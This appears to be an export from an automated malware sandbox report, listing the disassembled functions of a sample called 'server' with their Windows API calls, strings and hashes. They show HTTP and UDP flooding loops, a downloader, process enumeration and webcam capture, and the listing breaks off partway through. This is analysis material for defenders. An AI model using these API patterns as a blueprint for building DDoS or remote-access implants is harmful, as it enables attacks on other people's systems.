Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: Process$CreateSleepThread$Messagesprintf$CountCurrentDirectoryExitInputPostStateSystemTerminateTickUserrand
String ID: "%s" "%s?abc=%d%d%d%d"$D
API String ID: 172844161-298079244
Opcode ID: 996b448a330ea39742fb996c5da3b8e9d5bac2eccd2bcf86842a313de783662b
Instruction ID: dee45d619fc2e394e3d2b66f1065b8d82e3a70ab678904dd2a9156dbc98c66a4
Opcode Fuzzy Hash: 996b448a330ea39742fb996c5da3b8e9d5bac2eccd2bcf86842a313de783662b
Instruction Fuzzy Hash: C44185B26043856EF710D754CC41FB777A9FBC4704F100929F7899A281DAB5A9098B63

Function 100097A0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 127filestringCOMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 100097B4

Part of subcall function 10009720: ??2@YAPAXI@Z.MSVCRT(00000400,?,76F90F10,76F92EE0,10002AEA,?,SSSSSS), ref: 10009728
Part of subcall function 10009720: FindResourceA.KERNEL32(?,0000006C,HOST), ref: 10009749
Part of subcall function 10009720: LoadResource.KERNEL32(?,00000000), ref: 10009751
Part of subcall function 10009720: LockResource.KERNEL32(00000000), ref: 10009758
Part of subcall function 10009720: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009784

CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 1000986B
GetFileSize.KERNEL32(00000000,00000000), ref: 1000987E
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 10009892
lstrlen.KERNEL32(?), ref: 100098A0
??2@YAPAXI@Z.MSVCRT(00000000), ref: 100098A9
lstrlen.KERNEL32(?,?,00000000), ref: 100098CF
WriteFile.KERNEL32(00000000,00000000,00000000), ref: 100098D8
CloseHandle.KERNEL32(00000000), ref: 100098DF

Strings

XXXXXX, xrefs: 100097C0
.key, xrefs: 10009836

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: File$Resource$??2@lstrlen$??3@CloseCreateDirectoryFindHandleLoadLockPointerSizeSystemWrite
String ID: .key$XXXXXX
API String ID: 3558955628-2601115946
Opcode ID: d24516f02ea8cd83adf64a079234290d1210b910ff9b8bcf6310260086aca102
Instruction ID: d999d40ade01bfd780963a7e4da00662e15d7ecd24b9ce1fec2d34a8ea1a0eed
Opcode Fuzzy Hash: d24516f02ea8cd83adf64a079234290d1210b910ff9b8bcf6310260086aca102
Instruction Fuzzy Hash: E0313B722406441BE728DA749C9AB6B368BEBC5371F14072DFA67872D1DEE49D098350

Function 1000D500 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 99libraryloadersleepCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ws2_32.dll), ref: 1000D50E
GetProcAddress.KERNEL32(00000000,closesocket), ref: 1000D51E
LoadLibraryA.KERNEL32(ws2_32.dll), ref: 1000D57A
GetProcAddress.KERNEL32(00000000,send), ref: 1000D586
GetLastError.KERNEL32(?,?,00000000), ref: 1000D5BA
CloseHandle.KERNEL32(00000000), ref: 1000D5FB
Sleep.KERNEL32(00000002), ref: 1000D611
FreeLibrary.KERNEL32(?), ref: 1000D628

Strings

send, xrefs: 1000D580
closesocket, xrefs: 1000D514
ws2_32.dll, xrefs: 1000D509, 1000D575

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: Library$AddressLoadProc$CloseErrorFreeHandleLastSleep
String ID: closesocket$send$ws2_32.dll
API String ID: 2554972651-2162363962
Opcode ID: 7ecabd3abaaee7e7d6219c6ba1515479c9e7988b56b45e660df247fc14e0e3a4
Instruction ID: 67dba68df69635aebfa3a3596635123a731ded8294c22980d7a7e8a666a99e77
Opcode Fuzzy Hash: 7ecabd3abaaee7e7d6219c6ba1515479c9e7988b56b45e660df247fc14e0e3a4
Instruction Fuzzy Hash: 6031E330104751ABF604EF68CC84B6F77E9FF89795F010A1AFA49D7185CB71E8008B61

Function 10004130 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networksleepthreadCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 10004144
htons.WS2_32 ref: 1000416B
inet_addr.WS2_32(1007DD2C), ref: 1000417B
socket.WS2_32(00000002,00000001,00000000), ref: 1000419A
connect.WS2_32(00000000,?,00000010), ref: 100041AA
send.WS2_32(00000000,GET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET !@#$%.htmGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#,?,00000000), ref: 100041CF
Sleep.KERNEL32(00000032,?,00000000), ref: 100041D8
closesocket.WS2_32(00000000), ref: 100041E5
RtlExitUserThread.NTDLL(00000000), ref: 100041F6
closesocket.WS2_32 ref: 100041FD

Strings

GET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET !@#$%.htmGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#, xrefs: 100041B7, 100041C9

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: closesocket$ExitSleepStartupThreadUserconnecthtonsinet_addrsendsocket
String ID: GET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET !@#$%.htmGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#
API String ID: 4272391932-4039768343
Opcode ID: 68e5b576acd18c2c4b14ef7e3e27ec556b121b0e629d7d28d9c654a0c05f4b01
Instruction ID: 045f70dc197dd2c2e97778d2da9c7e2bc6c5d128113408fc6fa20a61d9539879
Opcode Fuzzy Hash: 68e5b576acd18c2c4b14ef7e3e27ec556b121b0e629d7d28d9c654a0c05f4b01
Instruction Fuzzy Hash: 802129711053A05BF300DF34CC89BAA3BA9FF45750F10062DF5A6D61E1EBB49D49876A

Function 1000C540 Relevance: 18.1, APIs: 12, Instructions: 76stringprocessCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1000C549
??2@YAPAXI@Z.MSVCRT(00000128,00000002,00000000), ref: 1000C559
Process32First.KERNEL32(00000000,00000000), ref: 1000C56B
GetLastError.KERNEL32(00000000,00000000), ref: 1000C574
_strupr.MSVCRT ref: 1000C58D
_strupr.MSVCRT ref: 1000C594
strstr.MSVCRT ref: 1000C59A
Process32Next.KERNEL32(?,00000000), ref: 1000C5B8
_strupr.MSVCRT ref: 1000C5C2
_strupr.MSVCRT ref: 1000C5C9
strstr.MSVCRT ref: 1000C5CF
Process32Next.KERNEL32(?,00000000), ref: 1000C5E2

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: _strupr$Process32$Nextstrstr$??2@CreateErrorFirstLastSnapshotToolhelp32
String ID:
API String ID: 3005159451-0
Opcode ID: 63d5324c3769c6fad5b2491b424af0fabcd44a692e81632836f318dc6d157164
Instruction ID: c0712735c5d1058a8d10a1fcff2c42ee7888384913c1c0693e55bcc166550335
Opcode Fuzzy Hash: 63d5324c3769c6fad5b2491b424af0fabcd44a692e81632836f318dc6d157164
Instruction Fuzzy Hash: 5D1106B69003552BF600D735AC85E9B7B9CDF803E6F04143AFD06D6201FA21FE5486B6

Function 00404F7F Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,00000100,0040642C,00000001,00000000,00000000,00000103,00000001,00000000,?,0040446F,00200020,00000000,?,00000000,00000000), ref: 00404FC1
LCMapStringA.KERNEL32(00000000,00000100,00406428,00000001,00000000,00000000,?,0040446F,00200020,00000000,?,00000000,00000000,00000001), ref: 00404FDD
LCMapStringA.KERNEL32(?,?,?,?,oD@ ,?,00000103,00000001,00000000,?,0040446F,00200020,00000000,?,00000000,00000000), ref: 00405026
MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,0040446F,00200020,00000000,?,00000000,00000000), ref: 0040505E
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,0040446F,00200020,00000000,?,00000000), ref: 004050B6
LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,0040446F,00200020,00000000,?,00000000), ref: 004050CC
LCMapStringW.KERNEL32(?,?,?,00000000,oD@ ,?,?,0040446F,00200020,00000000,?,00000000), ref: 004050FF
LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,0040446F,00200020,00000000,?,00000000), ref: 00405167

Strings

oD@ , xrefs: 0040517F, 004050F2, 00405017

Memory Dump Source

Source File: 00000003.00000002.2612467776.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2605808787.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2617496630.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2623270724.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2628429149.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2634431094.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_server.jbxd

Similarity

API ID: String$ByteCharMultiWide
String ID: oD@
API String ID: 352835431-4270158488
Opcode ID: 2afe8f83c1e32ad7c20cd3ef5f0d9ce625311a17c994b0e660629879fca01b21
Instruction ID: cd81302389fada6b5ad7ddbf8cce1e057f1d7051e18c97d2a0019bd6d71d522c
Opcode Fuzzy Hash: 2afe8f83c1e32ad7c20cd3ef5f0d9ce625311a17c994b0e660629879fca01b21
Instruction Fuzzy Hash: 04517B31900619EBCF228F94DD45AAF7FB9EB48750F10413AF915B52A0D37A8D21DFA8

Function 10012B60 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 108networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(Mozilla/4.0 (compatible),00000000,00000000,00000000,00000000), ref: 10012B86
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 10012BB4

Strings

MZ, xrefs: 10012C18
Mozilla/4.0 (compatible), xrefs: 10012B75

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: InternetOpen
String ID: MZ$Mozilla/4.0 (compatible)
API String ID: 2038078732-1122958964
Opcode ID: 1b603d2b6cb4bb4a2b0791728ef789fd7c844eea8b35218b3130136ed5bb0548
Instruction ID: 8c63eb6a41a225431111a82eac4f27fd10ac0d63006a227f2e92e921feb65f24
Opcode Fuzzy Hash: 1b603d2b6cb4bb4a2b0791728ef789fd7c844eea8b35218b3130136ed5bb0548
Instruction Fuzzy Hash: 3C31F5B1204359ABD210DF25DC80E9FBBEDFBC97A4F01092DF64097140D775E94987A6

Function 00401630 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 85COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?), ref: 0040164A
GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 00401698
wsprintfA.USER32 ref: 004016CA
GetFileAttributesA.KERNEL32(?), ref: 004016E6
ExitProcess.KERNEL32 ref: 004016F3

Strings

s, xrefs: 0040170A
H, xrefs: 00401701
t, xrefs: 0040170E
%s\SysTEM32\sysedit.exe, xrefs: 004016C4
o, xrefs: 00401706

Memory Dump Source

Source File: 00000003.00000002.2612467776.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2605808787.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2617496630.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2623270724.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2628429149.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2634431094.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_server.jbxd

Similarity

API ID: AttributesDirectoryExitFileProcessVersionWindowswsprintf
String ID: %s\SysTEM32\sysedit.exe$H$o$s$t
API String ID: 2470598139-87740868
Opcode ID: 251448df7b50cf4df5bb98e08941e18823b330a20de11f881ffddb0b690df73d
Instruction ID: 47bd58147c64a949f084ac4d6b8b2736ebceef07ebb8f42e32fac6c8f9cf200e
Opcode Fuzzy Hash: 251448df7b50cf4df5bb98e08941e18823b330a20de11f881ffddb0b690df73d
Instruction Fuzzy Hash: 02210830E00248BFDB10C768DC087CEBBB96F46304F0044E9E28AB22D1DBB45B88CA57

Function 10007F90 Relevance: 16.6, APIs: 11, Instructions: 136stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?), ref: 10007FC1
malloc.MSVCRT ref: 10007FC9
lstrcpy.KERNEL32(00000000,?), ref: 10007FE1
CharNextA.USER32(00000002), ref: 1000800D
CharNextA.USER32(00000002), ref: 1000802B
GetFileAttributesA.KERNEL32(00000000), ref: 1000806F
CreateDirectoryA.KERNEL32(00000000,00000000), ref: 1000807C
GetLastError.KERNEL32 ref: 10008086
CharNextA.USER32(00000000), ref: 100080A4
free.MSVCRT ref: 100080B9
free.MSVCRT ref: 100080E4

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: CharNext$free$AttributesCreateDirectoryErrorFileLastlstrcpylstrlenmalloc
String ID:
API String ID: 3289936468-0
Opcode ID: 91c087a2b93d1311ec0e6759ce73b84a9ff3fbed6c289464c935a959dac4fcdd
Instruction ID: 2210af07b0f8d49035197b9e4786ebf24fa4771591eb8ab4f4da9f9fb379daaa
Opcode Fuzzy Hash: 91c087a2b93d1311ec0e6759ce73b84a9ff3fbed6c289464c935a959dac4fcdd
Instruction Fuzzy Hash: E341C571C047A59FF7A1CF188C447AABBE9FB067E0F10016AD9E193244D3741A4ADBA1

Function 1000CF40 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 134fileCOMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1000CF72

Part of subcall function 10009720: ??2@YAPAXI@Z.MSVCRT(00000400,?,76F90F10,76F92EE0,10002AEA,?,SSSSSS), ref: 10009728
Part of subcall function 10009720: FindResourceA.KERNEL32(?,0000006C,HOST), ref: 10009749
Part of subcall function 10009720: LoadResource.KERNEL32(?,00000000), ref: 10009751
Part of subcall function 10009720: LockResource.KERNEL32(00000000), ref: 10009758
Part of subcall function 10009720: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009784

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 1000D029
GetFileSize.KERNEL32(00000000,00000000), ref: 1000D038
??2@YAPAXI@Z.MSVCRT(00000000), ref: 1000D041
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 1000D054
??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000000), ref: 1000D07C
CloseHandle.KERNEL32(00000000), ref: 1000D085

Strings

XXXXXX, xrefs: 1000CF7E
.key, xrefs: 1000CFED

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: FileResource$??2@??3@$CloseCreateDirectoryFindHandleLoadLockReadSizeSystem
String ID: .key$XXXXXX
API String ID: 710762369-2601115946
Opcode ID: f060dc9d51e19fff5d6fe7fdc321299b3120c7788261040069954f175d4ea1c6
Instruction ID: 0c7bdf6f6cfedffafb096b417f82647280419507c62535d74d6fa5ee32727597
Opcode Fuzzy Hash: f060dc9d51e19fff5d6fe7fdc321299b3120c7788261040069954f175d4ea1c6
Instruction Fuzzy Hash: A83137726006082FE318DA749C55A6B7A8BFBC5370F140B2DFA67C72D1EDE59D0D82A1

Function 10008360 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 130stringCOMMON

Download Yara Rule

APIs

GetLogicalDriveStringsA.KERNEL32 ref: 10008381
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,00000104), ref: 100083D7
SHGetFileInfo.SHELL32(?,00000080,?,00000160,00000410), ref: 100083F5
lstrlen.KERNEL32(?), ref: 10008409
lstrlen.KERNEL32(?), ref: 10008417
GetDiskFreeSpaceExA.KERNEL32(00000001,?,?,00000000), ref: 10008436
GetDriveTypeA.KERNEL32(?), ref: 1000847D
lstrlen.KERNEL32(?), ref: 100084E7

Strings

g, xrefs: 10008379

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: lstrlen$Drive$DiskFileFreeInfoInformationLogicalSpaceStringsTypeVolume
String ID: g
API String ID: 2496086942-30677878
Opcode ID: b1f0603da955b9deec9a7e30b8dcfd22e7aa198ea86b18fd6141ef5117c09393
Instruction ID: 7a94a0694180289e9c46b8d804f7d8816f5e215d3c8a1403c1990a7dea9b0a38
Opcode Fuzzy Hash: b1f0603da955b9deec9a7e30b8dcfd22e7aa198ea86b18fd6141ef5117c09393
Instruction Fuzzy Hash: 4E41C4705083869FD715CF14C880A9BB7EAFBC8744F04492DF9C987251D7B4AA09CBA2

Function 10004DC0 Relevance: 15.1, APIs: 10, Instructions: 92memorynetworksleepCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 10004DD1
WSASocketA.WS2_32 ref: 10004DEB
setsockopt.WS2_32(00000000,0000FFFF,00001005,?,00000004), ref: 10004E0E
inet_addr.WS2_32(1007DD2C), ref: 10004E3D
GetProcessHeap.KERNEL32(00000008,00001000), ref: 10004E4E
RtlAllocateHeap.NTDLL(00000000), ref: 10004E55

Part of subcall function 10004D70: GetCurrentProcessId.KERNEL32 ref: 10004D7F

GetTickCount.KERNEL32 ref: 10004E93
sendto.WS2_32(00000000,00000000,00001000,00000000,?,00000010), ref: 10004EBA
Sleep.KERNEL32(00000064,?,?,00000001), ref: 10004ECF
RtlExitUserThread.NTDLL(00000000,00000001), ref: 10004EE1

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: HeapProcess$AllocateCountCurrentExitSleepSocketStartupThreadTickUserinet_addrsendtosetsockopt
String ID:
API String ID: 4173591058-0
Opcode ID: a4ec68e89468125ac0a4209f7c8bae31b74d80ca69eebe526d17ee31116ff516
Instruction ID: c5a2debfd89a1f44daedc798f5d2e11e4375d7b03d2956684dd0a07df8b0980b
Opcode Fuzzy Hash: a4ec68e89468125ac0a4209f7c8bae31b74d80ca69eebe526d17ee31116ff516
Instruction Fuzzy Hash: 263138706403506BF310DF20CC4ABA677E9FF85B80F008529F695AA1D0EBF498098B26

Function 10068F60 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 317comCOMMON

Download Yara Rule

APIs

Part of subcall function 10069530: CoCreateInstance.OLE32(10077228,00000000,00000001,10077168,?,?,?,?,?,10068F83,?,?), ref: 1006954E
Part of subcall function 10069530: CoCreateInstance.OLE32(10077238,00000000,00000003,10077158,?,?,?,?,?,10068F83,?,?), ref: 10069562

CoCreateInstance.OLE32(10077198,00000000,00000001,100771A8,?,?,Capture Filter,?,?,?,?), ref: 10068FCD

Strings

vids, xrefs: 1006900C, 100690F4, 10069195, 100691B6
Capture Filter, xrefs: 10068FB0
*,, xrefs: 10069161
iavs, xrefs: 100690D0
Grabber, xrefs: 1006908F

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: CreateInstance
String ID: *,$Capture Filter$Grabber$iavs$vids
API String ID: 542301482-3686165303
Opcode ID: 32c67f297ac5bbe3568bbd34cd628c681e99ce76be26e9191f1ffbea16b09f8a
Instruction ID: 6b34a01a8f94a52d972c2f63ee6a2cae5e4b6e391ed04b1ad51ace7a22d3cd02
Opcode Fuzzy Hash: 32c67f297ac5bbe3568bbd34cd628c681e99ce76be26e9191f1ffbea16b09f8a
Instruction Fuzzy Hash: 45C126B46047019FD714CF28C894A5AB7EAFF88350F108A5DF99ACB7A1D730E946CB61

Function 10012780 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

Part of subcall function 10012620: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,76F90F10,76F90F00,76F92EE0,10002B01,Rstray.exe), ref: 10012628
Part of subcall function 10012620: ??2@YAPAXI@Z.MSVCRT(00000128,00000002,00000000,?,76F90F10,76F90F00,76F92EE0,10002B01,Rstray.exe), ref: 10012634
Part of subcall function 10012620: Process32First.KERNEL32(00000000,00000000), ref: 10012646
Part of subcall function 10012620: _strcmpi.MSVCRT ref: 10012658

OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 100127E5
OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 100127FF
GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 10012825
